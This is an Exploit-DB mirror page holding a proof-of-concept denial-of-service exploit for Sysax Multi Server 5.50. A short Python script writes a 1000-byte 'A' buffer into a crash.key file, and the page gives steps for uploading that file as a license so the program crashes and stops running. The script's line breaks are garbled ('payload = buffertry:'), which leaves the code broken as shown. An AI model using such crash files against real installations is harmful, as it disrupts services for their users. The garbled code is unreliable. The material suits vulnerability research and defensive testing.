exploit-db-mirror/exploits/windows/dos/47947.py
Offensive Security b8cbcf2571 DB: 2020-01-21
4 changes to exploits/shellcodes

Sysax Multi Server 5.50 - Denial of Service (PoC)

Easy XML Editor 1.7.8 - XML External Entity Injection
Adive Framework 2.0.8 - Persistent Cross-Site Scripting
Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)
2020-01-21 05:02:10 +00:00

27 lines
No EOL
792 B
Python
Executable file

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: WIndow 7
# CVE : [if applicable]
1) Download software install in window 7
2)run software then click install license
3) upload crash.key file and it will show run again this program
4 ) program crash , never run
#!/usr/bin/python
buffer = "A" * 1000
payload = buffertry:
f=open("crash.key","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")except:
print("File cannot be created.")